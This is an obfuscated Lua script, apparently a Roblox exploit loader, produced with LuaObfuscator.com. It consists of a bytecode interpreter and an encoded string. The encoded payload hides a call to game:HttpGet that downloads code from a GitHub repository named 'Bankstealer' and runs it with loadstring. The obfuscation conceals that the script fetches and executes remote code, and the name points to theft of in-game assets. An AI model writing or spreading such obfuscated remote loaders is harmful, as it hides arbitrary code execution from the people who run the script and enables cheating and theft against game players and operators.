--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v30,1,1));return "";end end else local v68=v2(v0(v30,16));if v19 then local v74=v5(v68,v19);v19=nil;return v74;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/(((2 + 3) -3)^(v32-((1 + 1) -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -((1432 -(282 + 595)) + 64)))) ;return v69-(v69%(932 -(857 + 74))) ;else local v70=(570 -(367 + 201))^(v32-1) ;return (((v31%(v70 + v70))>=v70) and ((2565 -(1523 + 114)) -(214 + 713))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (1274 -(226 + 1044)) ;return (v40 * ((16200264 + 56854510) -56277558)) + (v39 * (65653 -(32 + 85))) + (v38 * (251 + 5)) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,958 -(892 + 65) ,20) * ((4 -2)^32)) + v41 ;local v45=v20(v42,21,56 -(56 -31) );local v46=((v20(v42,58 -26 )==(351 -(87 + 263))) and  -(181 -(67 + 113))) or (1 + 0) ;if (v45==(0 -(0 -0))) then if (v44==(0 + 0)) then return v46 * (0 + 0) ;else local v75=0 -0 ;while true do if (v75==(0 -0)) then v45=953 -(802 + 149 + 1) ;v43=0 -0 ;break;end end end elseif (v45==(3712 -1665)) then return ((v44==(0 + 0)) and (v46 * ((998 -(915 + 82))/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(596 + 427) ) * (v43 + (v44/((2 -0)^(1239 -(1069 + 118))))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==0) then return "";end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v65=792 -(368 + 423) , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;while true do if (v50==(1 + 2)) then v57=nil;while true do local v76=0 -0 ;while true do if (v76~=0) then else if (v51~=2) then else local v98=0;while true do if (v98~=(0 + 0)) then else for v113=1,v56 do local v114=0;local v115;local v116;local v117;while true do if (v114~=(651 -(494 + 157))) then else v115=0;v116=nil;v114=1 -0 ;end if (v114==(1 + 0)) then v117=nil;while true do if (v115==(1 + 0)) then if (v116==1) then v117=v21()~=0 ;elseif (v116==(1 + 1)) then v117=v24();elseif (v116~=3) then else v117=v25();end v57[v113]=v117;break;end if (v115==0) then local v159=836 -(660 + 176) ;while true do if (v159~=(0 + 0)) then else v116=v21();v117=nil;v159=203 -(14 + 188) ;end if (v159==1) then v115=1;break;end end end end break;end end end v55[3]=v21();v98=1;end if (v98~=(676 -(534 + 141))) then else for v118=1 + 0 ,v23() do local v119=0 + 0 ;local v120;local v121;while true do if (v119==1) then while true do if (v120==(0 + 0)) then v121=v21();if (v20(v121,1,1)==0) then local v162=0;local v163;local v164;local v165;local v166;while true do if (v162~=0) then else v163=0;v164=nil;v162=1 -0 ;end if (1==v162) then v165=nil;v166=nil;v162=2;end if (v162~=(2 -0)) then else while true do if (v163==(8 -5)) then if (v20(v165,3,3)~=(1 + 0)) then else v166[3 + 1 ]=v57[v166[4]];end v52[v118]=v166;break;end if (v163==(398 -(115 + 281))) then local v168=0 -0 ;while true do if (v168==1) then v163=3;break;end if (v168~=0) then else if (v20(v165,1,1 + 0 )==(2 -1)) then v166[2]=v57[v166[2]];end if (v20(v165,2,7 -5 )==1) then v166[870 -(550 + 317) ]=v57[v166[3 -0 ]];end v168=1;end end end if (v163==0) then local v169=0 -0 ;local v170;while true do if ((0 -0)==v169) then v170=0;while true do if (v170==(286 -(134 + 151))) then v163=1666 -(970 + 695) ;break;end if (v170~=(0 -0)) then else local v182=0;while true do if (v182==(1990 -(582 + 1408))) then v164=v20(v121,6 -4 ,3 -0 );v165=v20(v121,4,6);v182=3 -2 ;end if (v182~=(1825 -(1195 + 629))) then else v170=1;break;end end end end break;end end end if (v163==(1 -0)) then local v171=0;while true do if (v171~=(242 -(187 + 54))) then else v163=782 -(162 + 618) ;break;end if (v171==0) then v166={v22(),v22(),nil,nil};if (v164==(0 + 0)) then local v178=0 -0 ;local v179;local v180;local v181;while true do if (v178==(0 -0)) then v179=0;v180=nil;v178=1;end if (v178~=1) then else v181=nil;while true do if (v179~=(0 + 0)) then else v180=0;v181=nil;v179=1637 -(1373 + 263) ;end if (v179==(1001 -(451 + 549))) then while true do if ((0 + 0)==v180) then v181=0;while true do if (v181==(0 -0)) then v166[3]=v22();v166[4]=v22();break;end end break;end end break;end end break;end end elseif (v164==(1 -0)) then v166[3]=v23();elseif (v164==2) then v166[1387 -(746 + 638) ]=v23() -(2^(7 + 9)) ;elseif (v164==3) then local v185=0;local v186;while true do if (v185~=(0 -0)) then else v186=0;while true do if (v186==(341 -(218 + 123))) then v166[3]=v23() -((1583 -(1535 + 46))^16) ;v166[4 + 0 ]=v22();break;end end break;end end end v171=1 + 0 ;end end end end break;end end end break;end end break;end if (v119~=(560 -(306 + 254))) then else v120=0;v121=nil;v119=1 + 0 ;end end end v51=5 -2 ;break;end end end if ((1467 -(899 + 568))~=v51) then else local v99=0 + 0 ;local v100;while true do if (v99==(0 -0)) then v100=0;while true do if (v100~=0) then else local v150=603 -(268 + 335) ;while true do if (v150==0) then v52={};v53={};v150=1;end if (v150==(291 -(60 + 230))) then v100=573 -(426 + 146) ;break;end end end if (v100==(1 + 0)) then v54={};v51=1457 -(282 + 1174) ;break;end end break;end end end v76=1;end if (v76==1) then if (v51==1) then local v101=0;while true do if (v101==0) then local v112=0;while true do if (v112~=1) then else v101=812 -(569 + 242) ;break;end if (v112~=0) then else v55={v52,v53,nil,v54};v56=v23();v112=1;end end end if ((1252 -(721 + 530))==v101) then v57={};v51=2;break;end end end if (v51~=(1274 -(945 + 326))) then else local v102=0 -0 ;local v103;while true do if (v102~=(0 + 0)) then else v103=0;while true do if (v103==(700 -(271 + 429))) then local v151=0 + 0 ;while true do if ((1500 -(1408 + 92))~=v151) then else for v160=1,v23() do v53[v160-(1087 -(461 + 625)) ]=v28();end return v55;end end end end break;end end end break;end end end break;end if (v50~=2) then else v55=nil;v56=nil;v50=3;end if (1==v50) then v53=nil;v54=nil;v50=1290 -(993 + 295) ;end if (v50~=0) then else v51=0 + 0 ;v52=nil;v50=1;end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...)local v77=v62;local v78=v63;local v79=v64;local v80=v27;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do v89=v77[v81];v90=v89[1];if (v90<=6) then if (v90<=2) then if (v90<=0) then v87[v89[2]]=v60[v89[3]];elseif (v90==1) then v87[v89[2]]();else local v122=v89[2];v87[v122]=v87[v122](v13(v87,v122 + 1 ,v82));end elseif (v90<=4) then if (v90==3) then v87[v89[2]]=v60[v89[3]];else do return;end end elseif (v90>5) then local v126=0;local v127;while true do if (v126==0) then v127=v89[2];v87[v127]=v87[v127](v13(v87,v127 + 1 ,v82));break;end end else do return;end end elseif (v90<=9) then if (v90<=7) then local v106=0;local v107;local v108;local v109;local v110;while true do if (v106==0) then v107=v89[2];v108,v109=v80(v87[v107](v13(v87,v107 + 1 ,v89[3])));v106=1;end if (v106==2) then for v152=v107,v82 do local v153=0;while true do if (0==v153) then v110=v110 + 1 ;v87[v152]=v108[v110];break;end end end break;end if (v106==1) then v82=(v109 + v107) -1 ;v110=0;v106=2;end end elseif (v90>8) then local v128=v89[2];local v129=v87[v89[3]];v87[v128 + 1 ]=v129;v87[v128]=v129[v89[4]];else local v133=v89[2];local v134,v135=v80(v87[v133](v13(v87,v133 + 1 ,v89[3])));v82=(v135 + v133) -1 ;local v136=0;for v147=v133,v82 do v136=v136 + 1 ;v87[v147]=v134[v136];end end elseif (v90<=11) then if (v90==10) then v87[v89[2]]=v89[3];else local v139=v89[2];local v140=v87[v89[3]];v87[v139 + 1 ]=v140;v87[v139]=v140[v89[4]];end elseif (v90>12) then v87[v89[2]]();else v87[v89[2]]=v89[3];end v81=v81 + 1 ;end end;end if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F2O786E65766572312F42616E6B737465616C65722F6D61696E2F42616E6B537465616C6500083O00124O00013O00122O000100023O00200900010001000300120A000300044O0007000100034O00065O00022O000D3O000100012O00043O00017O00",v9(),...);